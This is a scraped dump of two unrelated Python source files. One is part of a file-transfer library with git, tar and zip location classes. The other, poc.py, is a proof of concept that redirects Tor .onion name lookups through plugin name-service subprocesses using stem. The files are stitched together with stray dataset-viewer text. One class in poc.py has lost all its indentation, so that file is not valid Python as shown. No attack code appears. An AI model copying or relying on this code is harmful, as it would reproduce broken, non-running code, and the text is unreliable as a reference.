                sub_to = self.git( 'ls-tree', to_commit, fname ).split()[2] if to_commit else None
                for f in self.sub_location( fname ).source( sub_from, sub_to, recursive ):
                    yield f.rename( os.path.join( fname, f.name ) )
                continue
            f = self.get( fname )
            if mode == 'D':
                # Deleted files are yielded as markers so destinations can remove them.
                f.delete = True
            yield f
        if include_version:
            p = pipe( '.version' )
            if to_commit:
                p.w.write( to_commit )
            else:
                p.w.write( self.get_current_commit() )
            p.w.close()
            yield p.r
class file_location( location ):
    '''Location backed by a single file object rather than a URL.'''
    def __init__( self, f ):
        # Deliberately skips location.__init__ -- there is no URL here,
        # only a raw file object.
        self.f = f
    def open( self ):
        pass
class tar( file_location ):
    '''Tar file Location
    Represents the files inside a tar archive as a location, allowing files to be extracted or zipped up.
    NOTE: Beware of using this with large pipe-based files, anything larger than taters.pipe.chunk_max (8MiB by default) will most likely cause unknown issues.
    TODO: Fix me!'''
    def __init__( self, f ):
        self.f = f
    def open( self, mode ):
        '''Open the underlying file object as a tar archive in *mode*.'''
        self.tar = tarfile.open( fileobj = self.f, mode = mode )
    def source( self ):
        '''Yield a file object for each member of the archive.'''
        self.open( 'r|*' )
        for tarinfo in self.tar:
            # BUG FIX: was ``tar.extractfile(tarinfo)`` -- that referenced the
            # *class* ``tar`` instead of the opened archive instance, which
            # would raise a TypeError on first use.
            yield self.tar.extractfile( tarinfo )
    def destination( self, files ):
        '''Write *files* into a new gzip-compressed tar stream.'''
        self.open( 'w|gz' )
        for f in files:
            tarinfo = tarfile.TarInfo( f.name )
            if isinstance( f, pipe._reader ):
                # It's a pipe, so tee it and read all its data to get size
                # Not ideal, and will break on files larger than pipe's chunk_max, but will work for now
                f1, f2 = tee( f )
                tarinfo.size = len( read_all( f1 ) )
                self.tar.addfile( tarinfo, f2 )
            else:
                f.read(0)
                tarinfo.size = f.size
                self.tar.addfile( tarinfo, f )
class zip( file_location ):
    '''Zip file Location
    Represents the files inside a zip archive as a location, allowing files to be extracted or zipped up.
    TODO: Implement me!'''
    # Use the stdlib zipfile module:
    # https://docs.python.org/2/library/zipfile.html
    # NOTE: this class name shadows the builtin ``zip`` within this module.
    pass
|
poc.py | # note: this needs stem to run. you can
# install it in a fresh virtualenv on Debian (after "apt-get install
# python-virtualenv") like so:
#
# virtualenv venv
# source venv/bin/activate
# pip install --upgrade pip
# pip install stem
#
# Then you can run this:
# python3 poc.py
#
# ...and then visit any .onion address, and it'll get re-directed to
# txtorcon documentation.
import os
import subprocess
import sys
import time
import itertools
from copy import deepcopy
from os.path import join, split
from threading import Thread
import stem
from stem.control import EventType, Controller
from settings_services import _service_to_command
from settings_port import tor_control_port
class NameLookupError(Exception):
    """Raised when a Tor name service reports a failed resolution.

    The numeric resolver status code is kept on the instance as ``status``
    and translated into a human-readable exception message.
    """

    def __init__(self, status):
        self.status = status
        messages = {
            0: 'The name resolution was successful',
            1: 'Name resolution generic failure',
            2: 'Name tld not recognized',
            3: 'Name not registered',
            4: 'Name resolution timeout exceeded',
        }
        super(NameLookupError, self).__init__(messages[status])
class _TorNameServiceProtocol(object):
delimiter = '\n'
def __init__(self, tor, process):
self._queries = dict()
self._id_gen = itertools.count(1)
self._tor = tor
self._process = process
def watch_stdout(self):
for line in self._process.stdout:
self.lineReceived(line)
def lineReceived(self, line):
args = line.split()
if args[0] == 'RESOLVED':
# Answer might contain whitespace if it's an error message; if so,
# len(answer) will be greater than 1.
query_id, status, answer = args[1], args[2], args[3:]
query_id = int(query_id)
status = int(status)
try:
stream_id = self._queries[query_id]
del self._queries[query_id]
except KeyError:
print("No query {}: {}".format(query_id, self._queries.keys()))
if status == 0:
# Answer should be a domain name or IP address, neither of
# which will contain whitespace, so only take the first
# whitespace-separated token.
answer = answer[0]
self._tor.msg('REDIRECTSTREAM ' + stream_id + ' ' + answer)
try:
self._tor.attach_stream(stream_id, 0)
except stem.UnsatisfiableRequest:
pass
else:
self._tor.close_stream(stream_id, stem.RelayEndReason.RESOLVEFAILED)
def request_lookup(self, stream_id, name):
query_id = next(self._id_gen)
self._queries[query_id] = stream_id
self._process.stdin.write('RESOLVE {} {}\n'.format(query_id, name))
def spawn_name_service(tor, name):
    """Launch the resolver subprocess configured for *name* and wrap it in a
    _TorNameServiceProtocol whose stdout is watched from a background thread."""
    try:
        command = _service_to_command[name]
    except KeyError:
        raise Exception(
            "No such service '{}'".format(name)
        )
    # Child gets our environment plus the tor-name-service contract variables.
    child_env = deepcopy(os.environ)
    child_env['TOR_NS_STATE_LOCATION'] = '/var/lib/tor/ns_state'
    child_env['TOR_NS_PROTO_VERSION'] = '1'
    child_env['TOR_NS_PLUGIN_OPTIONS'] = ''
    process = subprocess.Popen(
        command,
        bufsize=1,
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        universal_newlines=True,
        env=child_env,
    )
    proto = _TorNameServiceProtocol(tor, process)
    watcher = Thread(target=proto.watch_stdout)
    watcher.start()
    return proto
class _Attacher(object):
    """Attaches (or redirects) new Tor streams using per-suffix name services."""

    def __init__(self, tor):
        self._tor = tor
        self._services = {}  # suffix -> running name-service protocol

    def maybe_launch_service(self, name):
        """Return the name service responsible for *name*, spawning it on
        first use.  Raises if no configured suffix matches."""
        suffix = None
        srv = None
        for candidate_suffix in _service_to_command:
            if name.endswith("." + candidate_suffix):
                suffix = candidate_suffix
                srv = self._services.get(suffix, None)
                break
        # BUG FIX: when no suffix matched, the old code still called
        # spawn_name_service(self._tor, None), producing the misleading
        # error "No such service 'None'".  Fail with a clear message instead
        # (still an Exception, so attach_stream's handler behaves the same).
        if suffix is None:
            raise Exception("No name service configured for '{}'".format(name))
        if srv is None:
            srv = spawn_name_service(self._tor, suffix)
            self._services[suffix] = srv
        return srv

    def attach_stream(self, stream):
        """Stem STREAM-event listener: route resolvable streams to a service."""
        print("attach_stream {}".format(stream))
        # Not all stream events need to be attached.
        # TODO: check with Tor Project whether NEW and NEWRESOLVE are the correct list.
        if stream.status not in [stem.StreamStatus.NEW, stem.StreamStatus.NEWRESOLVE]:
            return
        try:
            srv = self.maybe_launch_service(stream.target_address)
        except Exception:
            # No service handles this address: hand the stream back to Tor.
            print("Unable to launch service for '{}'".format(stream.target_address))
            try:
                self._tor.attach_stream(stream.id, 0)
            except stem.UnsatisfiableRequest:
                pass
            return
        srv.request_lookup(stream.id, stream.target_address)
def main():
    """Connect to the Tor control port, verify torrc safety, and attach a
    STREAM-event listener that redirects lookups to name services."""
    while True:
        try:
            # open main controller; retry until the control port is up.
            controller = Controller.from_port(port = tor_control_port)
            break
        except stem.SocketError:
            time.sleep(0.005)
    controller.authenticate()
    print("[notice] Successfully connected to the Tor control port.")
    # Streams must be left unattached by Tor so we can attach them ourselves.
    if controller.get_conf('__LeaveStreamsUnattached') != '1':
        sys.exit('[err] torrc is unsafe for name lookups. Try adding the line "__LeaveStreamsUnattached 1" to torrc-defaults')
    attacher = _Attacher(controller)
    controller.add_event_listener(attacher.attach_stream, EventType.STREAM)
    print('[debug] Now monitoring stream connections.')
    try:
        # Sleeping for 365 days, as upstream OnioNS does, appears to be incompatible with Windows.
        # Therefore, we instead sleep for 1 day inside an infinite loop.
        while True:
            time.sleep(60 * 60 * 24 * 1) #basically, wait indefinitely
    except KeyboardInterrupt:
        print('')
# Run the attacher only when invoked as a script, not on import.
if __name__ == '__main__':
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.